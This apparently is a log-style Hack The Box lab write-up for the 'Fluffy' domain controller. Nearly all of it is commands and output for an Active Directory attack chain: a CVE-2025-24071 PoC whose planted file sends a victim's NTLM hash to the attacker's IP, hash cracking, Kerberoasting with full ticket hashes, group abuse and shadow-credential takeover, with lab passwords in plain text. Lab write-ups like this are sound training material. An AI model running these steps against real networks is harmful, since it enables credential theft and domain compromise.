Foothold
❯ git clone https://github.com/Marcejr117/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (42/42), done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 42 (delta 11), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (42/42), 2.12 MiB | 4.78 MiB/s, done.
Resolving deltas: 100% (11/11), done.
❯ cd CVE-2025-24071_PoC
❯ ls
PoC.py README.md usecase.gif
❯ python PoC.py hi 10.10.14.17
[+] File hi.library-ms created successfully.
❯ ls
exploit.zip PoC.py README.md usecase.gif
❯ sudo responder -I tun0❯ mv exploit.zip openme.zip
❯ smbclient -U 'j.fleischman%J0elTHEM4n1990!' //DC01/IT
Try "help" to get a list of possible commands.
smb: \> put openme.zip
putting file openme.zip as \openme.zip (1.4 kb/s) (average 1.4 kb/s)
smb: \> exit
~/htb/fluffy/IT ❯ hashcat -m 5600 p.agila.hash ~/rockyou.txt -O
❯ hashcat -m 5600 p.agila.hash ~/rockyou.txt -O
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 7 6800HS with Radeon Graphics, 10572/21208 MB (4096 MB allocatable), 16MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 4 MB
Dictionary cache hit:
* Filename..: /home/adot/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921506
* Keyspace..: 14344385
P.AGILA::FLUFFY:d72ce96bdacb6a55:f9a4feff02fc45bb961f6946de62eebb:01010000000000000097ec87ec33dc018b12ece97b1688300000000002000800300059005900440001001e00570049004e002d005a0043003700440041004c004400520055004200530004003400570049004e002d005a0043003700440041004c00440052005500420053002e0030005900590044002e004c004f00430041004c000300140030005900590044002e004c004f00430041004c000500140030005900590044002e004c004f00430041004c00070008000097ec87ec33dc01060004000200000008003000300000000000000001000000002000006093f0862f639e03ef0150d1cd5d66c5031b9ec4cc50cb77dce333b0ca13293e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310037000000000000000000:prometheusx-303
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: P.AGILA::FLUFFY:d72ce96bdacb6a55:f9a4feff02fc45bb96...000000
Time.Started.....: Thu Oct 2 22:41:53 2025 (2 secs)
Time.Estimated...: Thu Oct 2 22:41:55 2025 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (/home/adot/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3524.7 kH/s (3.47ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4524149/14344385 (31.54%)
Rejected.........: 2165/4524149 (0.05%)
Restore.Point....: 4507759/14344385 (31.43%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: psynbd1 -> principoo1
Hardware.Mon.#1..: Temp: 80c Util: 73%
Started: Thu Oct 2 22:41:49 2025
Stopped: Thu Oct 2 22:41:56 2025
p.agila:prometheusx-303
❯ bloodhound-python -d fluffy.htb -u p.agila -p prometheusx-303 -ns 10.10.11.69 -c all --dns-timeout 30
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 11S
❯ sudo ntpdate -u 10.10.11.69
2025-10-04 21:44:17.206471 (-0500) +25201.412697 +/- 0.024443 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.412697❯ impacket-GetUserSPNs fluffy.htb/p.agila:prometheusx-303 -dc-ip 10.10.11.69 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- --------- --------------------------------------------- -------------------------- -------------------------- ----------
ADCS/ca.fluffy.htb ca_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 11:07:50.136701 2025-05-21 17:21:15.969274
LDAP/ldap.fluffy.htb ldap_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 11:17:00.599545 <never>
WINRM/winrm.fluffy.htb winrm_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-05-17 19:51:16.786913 2025-05-19 10:13:22.188468
[-] CCache file is not found. Skipping...
$krb5tgs$23$*ca_svc$FLUFFY.HTB$fluffy.htb/ca_svc*$4e3c34292747341871bb062c26922aaa$8694be0a26a2c828d0d9ecf7552f414321516d6eaffb60efda06951fcef463aaad1d50ef01919bbb433312d2392f6335c21cba8bc86dd6d92b49634db5c8bd652d5073b01c121c1d1bc0280f97bb316aed6aa9233be05d73ca8ace3fdc871738d92f585a69807a222454ad573fbb2eb5d17777c609c465257d0b6d1d0026182833344b872ceddba5941b50e9377a2d259d9bc2ec3caea62a546db1cd0cd7147fe924e9eee1b37b4e029486419a369e5e334ef71bed1b315263f8261221f7da7ead4f2e47fd8150e7bb90a56c5eefe541d662145c7a48173307905c85fe3ff72539efda922d0b3d8875b562e77c7790425dd6688069c5a6b7d3b57ecff77c7ac75f885659dada52efea0be8697707993ceead1792661f49b8c24873ae1d44addfe0a00a1807fcdb82ab3a91e0516b74cf83c3fbad0cf309892100a69e69ff305bc56a142ecb8f2ff7fe4afecb9f8d967ec875bfd8bc60e430cc15ff7d6395daf492770c345aa65cda0d7723853728df4a6dcbf5ee7d982b777c134f3275558d4af97e35bace253b73b3c0bdee45fde21545dc5920455e06c5dd4e890770e77bde39d86b118521ae1a85d16f16fc65b17c01ccc68bd62f077302742872bbdda3acd3baa8956ab4a43bf6e6f03b9c8cf1efb820ad764b362ed5071cbac6fef844b0c90458f7cc2fe61c951d8cb68d5694b1720094f17f4796014428670bc028f48f2b94d4934be7e412556e645f8d2a3b0749d69722f61032ba26fa56c10bfac3678207af7a630a99b4f70f749d36bfe387a4e6d953c8b294b2ab48113dd168e8348fa8ee0ff817eca3115831d068cdb4222a928f2ffa28cecf353a3328d4130e3880fb2bf8498198cf458b08b45df2da95829ed2da0c0de65180dc0281a6b053e81606e8cb4faf70109587ec18d8ba567ebaf24daa79b4ea25047b1434dc71d49d283cb8ab077eab659388a2d5c61d733cca589f5e5fa82d1450b0f641440f843287e6e5ceb6c0cd67e0f61b0e0dc56c4309e76b2266014db5a35f1579037ad89e80e0aa4da38b855b899d6585e72c3c47aeae9c175ba99bfcb2121f37c5b5f2273d4724103ee6ab9a38281e128109ddc520c78a2c2ae9ae2bfa2cb4ddc0cb2f694033ef0421dbb490906680b351583652295489bd9c9ca1afe69752e903d7a016f9aea5d1044258d1c0ecb3f1254b0c4b22a841039bd00dd2aaa2e9466e3a1c98b0dd5d202ddc0115432e128812240c59bd7c21dcf1efbe50d9577ec574234fcc8933fc082673b42867b5bea7d50e2e6635be6fdaa60155fb23d7c861dc44781e9d36dc7736e6c2d9655d157e89536542dd3a879709da340498fc3620313831c1a44fe92cdf618c2a19abafa8aa228fa748b4a3c2819a58d6844886f926cdb4dd9b21b3e9e1a989f697026228bac6bc480bdbb56359b9faaa101c2f44ade6a4dde3bc31bbc616cc81ded2482913f90b7405a3ef2da4ac99daa572a1a633ebabd7048d36edbe51bd1484ce
$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$aca835d5761cea38198c50aa6fcb5259$d389611883dcdd6085a47b11991134759d4e48f32ae0505716a46741593f20272ad0bd6229186c90036abf6050f5ffc719b3983ec0ad1954128e340f1d4ba7550304fc0585799c7c34810bb5f01f43021863b529426403d6051bee75d8a55973db5f9ee16915f62312aa9816b112a0b4d6bcd46a9f522cb48ba13e1438e2da0211342a548f2386b2a69d81281b61bd32a36ec35a1282c8ab6241b46fd2c08bb6e46821995d8661670a98ad2c5a739f79eeb6e57c62257ced35b7b3eaa1d048cf764c18ba975ce8689c346bea599fc21b0cdaae21c2f97beaa4a0acab46e6f751afeee9b102e276cfd66a15a037e1e374ecf674aee176f7a4eb88a3c13239d9c0e62d43ffc274ed6f3fe13b09bdfc8bd901f8996e0f758ca49600da539d01003cd7da7ce6c749952dcc4de27d4a0eedcc0b8893209ea573fadd83ff510d907dffd602c47c4277773783375ea61a51806ad56b19d5f0502f34b6dadff69e77d6ebe044021145456bbc9bb3d3ef567047ca94d191b4d8dfe404caebf61852cc165ac1b52b5da382e8f6e09c7d289e844bef0da71d2c6c131f5b08b8b3c01faec5bf896df1b6644265ee61bd6e3e142df42023b9049ae57be40d8f0a18e666af3494953bac973fcbf414ce2ba59698d56930f77a3dbea645093d4a07f1754f22a16deb8ed4c40620c4c5c445ad686a813daabf3101a1fade29e820e3d16f2e6d065944036fdbaa89d72a5cdd5bfc351a8d2aba6ff982a9d9aab21cd93cea5e4e91e87610ebabe1f271ee8d5ded3d491dffda898fb7b3c428d998ccbc04ada77b139282a73a68b0e0852fea6b73bddf87508ce2c51afc7fd48c97ac8971b961764839a2aecc61238f7822780d1e7c4958968b7da8cfad4d9331273f0bcd804830d0dc8aaf8c4cc1d30bdddd9762b63e4fb2bb421adb1ea5ff27fa337affcbafe66d1313aac8502c9e8a49467799905109ac32eca7b99b920ec0fafe75ec299f9d955944eb12935047cc1359fe56603db838d41ca4c3984fd211228d4e7e73ca9d636ec756497750ee026e63da57167b9fb84f5b9ef525355042062db8a97651e61a4dd61cccfd4def006c561ea8b952c8ae90107d552a57ecc959ccfb08b395f703ae822256b5984da5eefaf6173ff5972bd792f8738b619578088bd31d51b0466df1519b8a7a65572f0b1b6ee71bda2dd5f8dbb22d29060f60518db605abe5a2480b54bf1426680a89b6d5fc9070cf32187d9901819a7a0d11b6da732d4f3e7752f5551322eee5c21a49301b34f1cd2b0e1c32d39ae513c4628e71e880f68f45b8dc8b7a9011819b58b34f3ad6624fd154c469b901878bcdfc13583abda86c3dd66c5ff5019a9288476b1aada2de364d35603f81858663ee6196c029c236eeaa4f2c972aad88cff220a64fb3a716df32ac71fcc58acc27eed41d6158546f82ab2eeb87b6a1f2deed64f33c208ecb0ab441de3f4cecc4ccc31f7cfdf688e8c2d9f7a1c16e677d6df4a377b830
$krb5tgs$23$*winrm_svc$FLUFFY.HTB$fluffy.htb/winrm_svc*$eac47de8cac33f91266e1f4f11672db5$d622e0e32f99f44ad4e0e0f9480cb12354418766ebf8ef4b3d6c30b402134c00600252d85a72f49345f50da2446e310bdfecaf4b10b3add2983cc0d99088668efd968f43dab30dca466191bdb087455b2d794c2b52510630910d66fe64d3f9e0ae3546343b957d7900525abef37170a030f4f9b6dde93bdad2cc042e9eb2e91d9d40e9f390718d81d92790917823d144381735c4ca4f5f21f399ee18ab08c807f6d6c4c90c053cb6b2c35b2e6407f1666432b833f79f5d134a025dd2dd894eaec614f5cf85860ac5c60fb1c5bc16c8b73410d13bc4ab158dae91af63592703f564234252456d5dd932ea3e23e3934819fa113d72e932562449ca7018e75c596007dd3172a15d3139e50c659a634f9f997f0efb8062b90af1734ca1d897cc7bf99833a567ffecee4f699b5218622a14cafba12e4e7d02fa0163ddae7b5654f86b5977d6192e3e4ef6c88e0d42b01e4048dc352fe15fc925e9dd97d6b15cf946fcc4b6baeb3858cefa7642449b6d4aa55cdcf4d0e2124a52196eea5a491459ff7d6bd14fe053905bf8cd95a7c1508aaa834c7c361cec14fb90665a6405e3a2f7a0edaeb48752704101969e9ebd500cb2418c632add4664f82469a68fa7af58118269f3e3ea9fd1e7d4b30d0cbbed09857279c5c685397e0f0f15bf597ba59a8ceed54748dfbc0e7c5f6bc931ff6e072c006821b342c580c8d98f86324aa33e6fcbc030993dc24a8807638c77a87c118046a4b9b7ec563a96e8a366ccab2d748fe9a2dfa98f2835f248f8f395e726a9748c050b0677d7b79719d391d24c9d3e7d2201d447d8cab1cd12edefb4ad457f8c0d0fa1ea8dad5a18a77335cdf06c48e0f95d10dae1934443ec33cfb45de98c78da10124ac1ed3abd94b67cda4336e069a681dc500afefe49ec8e5146752e6b30defe792d494c703d582ccf81ff6416e9f212b23ca1230c12faab0a5f7697fd0a5018c5b83cee8f00da5e85bbbadcd8aa69b566d1404c4e5fd2d8f7f54c40281f2c638378c8b4efcfd67eb97841fca8ddba03ba40bc69e401b4effc24d55bd17c68feb82e66e8bd8ccd81310a1276f8065442d2998a38535c49702dbfa77d758a834f7233c060267b8e92b3f02994d7be2c638e1b6c9de850e565aa68dd5f5021e751ad45431aca65659e5aa525812f95020204c314ed38fb5ca7ceece50463b19c17c9de86e2f5cb51e64dfa03492fb999a32a1630a8883025c678aaebaa658c4ec081a7e6fb26a106b515ff6b6c182d60d8ced2d23a191c5f5d41407cf20056915d63ba656beb827df7f946ff54b099b6428c819308457ac1f69afecbc92ee2655e8ca4acebfca0864a242595591999be0713746c1cde64c53a8eb2255c34536ff37e651f897b82234885733faa5ea1174d0e46a170dee6427c5cbf56febe082e67569fa7685463fd871bb936fecf3fb1c52628dbe72105a39c6a1e3ae815a237d9dde9afe7bf2d263e40486dd02bdce869856856aa3039c9f26d
No cracks
❯ net rpc group addmem "Service Accounts" "Administrator" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "DC01.fluffy.htb"
❯ net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "DC01.fluffy.htb"
❯ net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "DC01.fluffy.htb"
❯ pywhisker -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "Administrator" --action add
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 9f3b12fe-4a54-90ae-61e3-704a40ec48e0
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: n0n6HPdf.pfx
[*] Must be used with password: SCXgHzlrQWbasQcSM6WW
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
SCXgHzlrQWbasQcSM6WW❯ netexec smb 10.10.11.69 -u winrm_svc --pfx-cert n0n6HPdf.pfx --pfx-pass SCXgHzlrQWbasQcSM6WW
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\winrm_svc:33bd09dcd697600edf6b3a7af4875767
Last updated
Was this helpful?